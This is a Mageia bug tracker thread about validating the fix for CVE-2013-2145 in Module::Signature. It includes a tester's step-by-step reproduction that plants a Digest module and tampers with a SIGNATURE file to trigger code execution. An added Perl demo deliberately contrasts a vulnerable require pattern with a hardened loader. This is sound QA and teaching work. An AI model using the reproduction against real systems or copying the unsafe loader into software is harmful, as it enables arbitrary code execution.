Bug 10558 - perl-Module-Signature new security issue CVE-2013-2145
Summary: perl-Module-Signature new security issue CVE-2013-2145
Status: RESOLVED FIXED
Product: Mageia
Classification: Unclassified
Component: Security
Version: 3
Hardware: i586 Linux
Priority: Normal  Severity: major
Target Milestone: ---
Assigned To: QA Team
QA Contact: Sec team
URL: http://lwn.net/Vulnerabilities/555218/
Whiteboard: MGA2TOO has_procedure MGA2-32-OK MGA2...
Keywords: validated_update
Reported: 2013-06-18 18:51 CEST by David Walser
Modified: 2014-05-08 18:07 CEST

Source RPM: perl-Module-Signature-0.690.0-1.mga3.src.rpm

Description David Walser 2013-06-18 18:51:36 CEST
Fedora has issued an advisory on June 9:
https://lists.fedoraproject.org/pipermail/package-announce/2013-June/109387.html

Mageia 2 and Mageia 3 are also affected.

Comment 1 Shlomi Fish 2013-06-18 19:32:35 CEST
Hi David,

thanks for the report. Updates pushed to Mageia 2, Mageia 3 and Mageia Cauldron:

http://pkgsubmit.mageia.org/

Regards,

-- Shlomi Fish
Comment 2 David Walser 2013-06-18 20:15:22 CEST
Thanks Shlomi!

If anyone wants to provide a more descriptive CVE summary, feel free :o)

More info is here:
http://openwall.com/lists/oss-security/2013/06/05/16

Advisory:
========================

Updated perl-Module-Signature package fixes security vulnerability:

Arbitrary code execution vulnerability in Module::Signature before 0.72
(CVE-2013-2145).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2145
https://lists.fedoraproject.org/pipermail/package-announce/2013-June/109387.html
========================

Updated packages in core/updates_testing:
========================
perl-Module-Signature-0.730.0-1.mga2
perl-Module-Signature-0.730.0-1.mga3

from SRPMS:
perl-Module-Signature-0.730.0-1.mga2.src.rpm
perl-Module-Signature-0.730.0-1.mga3.src.rpm
Comment 3 Samuel Verschelde 2013-06-25 15:02:31 CEST
Testing complete MGA2 x86_64

Here is my testing procedure:

As root:

1) install perl-Module-Signature
2) as root, create /usr/lib/perl5/vendor_perl/{your_version}/Digest/Special.pm

# cat Special.pm
system("touch /tmp/evilFile");

As a normal user:

1) make sure you already have a gpg key as your normal user, or create one with gpg --gen-key
2) rm -f /tmp/evilFile #justInCase
3) Then:
$ mkdir test-signature
$ cd test-signature
$ vim MANIFEST
$ cat MANIFEST
MANIFEST
$ cpansign sign
[...]
$ ls
MANIFEST  SIGNATURE
$ cat SIGNATURE 
This file contains message digests of all files listed in MANIFEST,
signed via the Module::Signature module, version 0.68.

To verify the content in this distribution, first make sure you have
Module::Signature installed, then type:

    % cpansign -v

It will check each file's integrity, as well as the signature's
validity.  If "==> Signature verified OK! <==" is not displayed,
the distribution may already have been compromised, and you should
not run its Makefile.PL or Build.PL.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SHA1 a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQEcBAEBAgAGBQJRyZLoAAoJEADHAciX3Qg1se0H/RSnw9Eu8ERwVc0NjhqCWcOz
XhcFUcsiWuIlKRu5tvEI0TtGUCOsgg0uHGHKdy8955XLFNQtcyb6MmyjxV04LGDu
o/hbarrnnzNVnFO14ECwmm6cl3X6CplJd4IWps9IeTPkFyqGiJiSgXkbG7Nopw14
15LNkFozqhy11F5CfkgoUDr7mn73AEsFi6beoTZi+Q2m1bdvvkPCSQy9d0sFPibS
tlXje2+tvzfo0jWQrefyWiA5Z9I9wTZyDfWBb06Sk5pYcoocGthgJbyl2ykgt7D7
7MKRL3c6XMNIXgkGqNfSJuNRCqfbjtN6LSqcW5sut+5ZTz1h5AAzeO7bQwcUAw4=
=lX23
-----END PGP SIGNATURE-----


Now we will alter this signature file, changing the "SHA1 a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST" line

[samuel.verschelde@tech009 test-signature]$ vim SIGNATURE
[samuel.verschelde@tech009 test-signature]$ cat SIGNATURE
This file contains message digests of all files listed in MANIFEST,
signed via the Module::Signature module, version 0.68.

To verify the content in this distribution, first make sure you have
Module::Signature installed, then type:

    % cpansign -v

It will check each file's integrity, as well as the signature's
validity.  If "==> Signature verified OK! <==" is not displayed,
the distribution may already have been compromised, and you should
not run its Makefile.PL or Build.PL.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Special a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQEcBAEBAgAGBQJRyZLoAAoJEADHAciX3Qg1se0H/RSnw9Eu8ERwVc0NjhqCWcOz
XhcFUcsiWuIlKRu5tvEI0TtGUCOsgg0uHGHKdy8955XLFNQtcyb6MmyjxV04LGDu
o/hbarrnnzNVnFO14ECwmm6cl3X6CplJd4IWps9IeTPkFyqGiJiSgXkbG7Nopw14
15LNkFozqhy11F5CfkgoUDr7mn73AEsFi6beoTZi+Q2m1bdvvkPCSQy9d0sFPibS
tlXje2+tvzfo0jWQrefyWiA5Z9I9wTZyDfWBb06Sk5pYcoocGthgJbyl2ykgt7D7
7MKRL3c6XMNIXgkGqNfSJuNRCqfbjtN6LSqcW5sut+5ZTz1h5AAzeO7bQwcUAw4=
=lX23
-----END PGP SIGNATURE-----

Now we run cpansign to verify the signature, thus tricking cpansign into executing our Special.pm evil script.

[samuel.verschelde@tech009 test-signature]$ cpansign
Unknown cipher: Special, please install Digest::Special
Can't call method "add" on an undefined value at /usr/lib/perl5/vendor_perl/5.12.3/Module/Signature.pm line 601, <F> chunk 1.

There are errors, because I haven't created a proper Special.pm script, but this is enough for the test because:

[samuel.verschelde@tech009 test-signature]$ ls /tmp/evilFile
/tmp/evilFile

The evil action has worked.


Then install the update candidate, remove /tmp/evilFile, run cpansign again in the appropriate directory, see that it hasn't created the evilFile. Then don't forget to remove that Special.pm you created.

$ cpansign
Malformed algorithm name: Special (should match /\w+\d+/) at /usr/lib/perl5/vendor_perl/5.14.2/Module/Signature.pm line 541.
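The code path Samuel's procedure exercises, as an added example that is not part of this bug report and not Module::Signature's own source: a Perl script that parses the digest lines of a SIGNATURE file, feeds the algorithm column to a deliberately unsafe loader (a hypothetical reconstruction of the pattern, where the name is interpolated into a module name and passed to require unchecked) and to a hardened loader that enforces the letters-then-digits shape seen in the fixed error message above and refuses relative @INC entries. The SIGNATURE excerpt is constructed from the lines shown in the procedure; $main::EVIL_RAN stands in for system("touch /tmp/evilFile"); the test above planted Special.pm in vendor_perl (root-writable), whereas here the payload sits in a scratch directory that is put on @INC as ".", the position an unpacked distribution's own directory has on a perl whose @INC still contains ".".

```perl
#!/usr/bin/perl
# Added example, not Module::Signature's source: a reduced model of the
# CVE-2013-2145 code path. The first column of each digest line in a
# SIGNATURE file names the algorithm; turn that into a module name and
# require it unchecked, and the SIGNATURE's author picks what gets run.
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Path qw(make_path);

our $EVIL_RAN = 0;   # stands in for system("touch /tmp/evilFile")

# Constructed SIGNATURE excerpt: the signed digest lines only, no PGP
# armour. Line two is the tampered line from the procedure above.
my $SIGNATURE = <<'END_SIG';
SHA1 a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST
Special a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST
END_SIG

# Parse "ALGORITHM HEXDIGEST FILENAME" lines into hashes.
sub parse_digest_lines {
    my ($text) = @_;
    my @entries;
    for my $line (split /\n/, $text) {
        next unless $line =~ /^(\S+)\s+([0-9a-fA-F]+)\s+(\S.*)$/;
        push @entries, { algorithm => $1, digest => $2, file => $3 };
    }
    return @entries;
}

# Vulnerable pattern (hypothetical reconstruction): untrusted text becomes
# a module name and goes straight to require, so whatever Digest/<name>.pm
# Perl can find through @INC is compiled and executed.
sub load_digest_unsafe {
    my ($algorithm) = @_;
    my $class = "Digest::$algorithm";
    eval "require $class; 1" or return undef;
    return $class;
}

# Hardened pattern: constrain the name to letters followed by digits before
# it reaches require (the /\w+\d+/ check in the fixed error message above)
# and drop relative @INC entries such as "." so a Digest/*.pm shipped inside
# the distribution itself can never satisfy the require.
sub load_digest_safe {
    my ($algorithm) = @_;
    my ($base, $variant) = $algorithm =~ /^([_a-zA-Z]+)([0-9]+)$/
        or die "Malformed algorithm name: $algorithm (should match /\\w+\\d+/)\n";
    local @INC = grep { !m{^\.} } @INC;
    # SHA1 may live in Digest::SHA1 or Digest::SHA; both candidate names
    # are built only from characters the regex allowed.
    for my $class ("Digest::$base$variant", "Digest::$base") {
        return $class if eval "require $class; 1";
    }
    die "Unknown cipher: $algorithm, please install Digest::$base$variant or Digest::$base\n";
}

# Run one loader on one algorithm name and record what happened.
sub attempt {
    my ($loader, $algorithm) = @_;
    $EVIL_RAN = 0;
    my $class = eval { $loader->($algorithm) };
    my $outcome = defined $class ? "loaded $class" : "refused: " . ($@ || "not found\n");
    chomp $outcome;
    return { outcome => $outcome, evil_ran => $EVIL_RAN };
}

# Demo: plant Digest/Special.pm and Digest/Special1.pm in a scratch
# directory, chdir there and put "." on @INC, then run both loaders.
sub run_demo {
    my $dir = tempdir(CLEANUP => 1);
    make_path("$dir/Digest");
    for my $name (qw(Special Special1)) {
        open my $fh, '>', "$dir/Digest/$name.pm" or die "open: $!";
        print $fh "\$main::EVIL_RAN = 1;\n1;\n";   # the planted payload
        close $fh;
    }
    chdir $dir or die "chdir: $!";
    push @INC, '.' unless grep { $_ eq '.' } @INC;

    my ($genuine, $tampered) = parse_digest_lines($SIGNATURE);
    my @steps;
    # a name that passes the regex is still not served from "."
    push @steps, [ 'safe   Special1' => attempt(\&load_digest_safe,   'Special1') ];
    # the tampered line: the unsafe loader runs the planted file
    push @steps, [ 'unsafe Special'  => attempt(\&load_digest_unsafe, $tampered->{algorithm}) ];
    # the same line through the hardened loader fails the name check
    push @steps, [ 'safe   Special'  => attempt(\&load_digest_safe,   $tampered->{algorithm}) ];
    # the genuine line loads a real module (Digest::SHA ships with perl)
    push @steps, [ 'safe   SHA1'     => attempt(\&load_digest_safe,   $genuine->{algorithm}) ];
    return \@steps;
}

for my $step (@{ run_demo() }) {
    my ($label, $r) = @$step;
    printf "%-16s -> %-62s evil code ran: %s\n",
        $label, $r->{outcome}, $r->{evil_ran} ? 'yes' : 'no';
}
```

Run it with `perl sig-loader-demo.pl` (hypothetical filename). The unsafe loader reports "loaded Digest::Special" with the evil flag set; the hardened loader refuses "Special" on the name check, refuses "Special1" with "Unknown cipher" because "." was dropped from @INC before the require, and loads Digest::SHA for the genuine SHA1 line. The two controls are independent: the regex alone would still let a tarball ship Digest/Special1.pm next to its SIGNATURE on a perl with "." in @INC, and the @INC filter alone would still let a name like "Special" reach require and be satisfied from any writable directory on @INC, which is what the vendor_perl placement in the procedure above shows.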
Comment 4 Rémi Verschelde 2013-06-25 17:25:04 CEST
Testing complete on Mageia 3 i586, following Stormi's procedure in comment 3.
That's nice for once, to be able to reproduce a security vulnerability :)
Comment 5 Rémi Verschelde 2013-06-25 17:32:14 CEST
Testing complete on Mageia 2 i586.
Comment 6 claire robinson 2013-06-26 12:06:27 CEST
testing mga3 64
Comment 7 claire robinson 2013-06-26 12:35:31 CEST
Testing complete mga3 64

Thanks for the procedure Samuel.

Validating. Advisory uploaded.

Could sysadmin please push from 2 & 3 core/updates_testing to core/updates

Thanks!
Comment 8 Nicolas Vigier 2013-06-26 20:28:27 CEST
http://advisories.mageia.org/MGASA-2013-0184.html
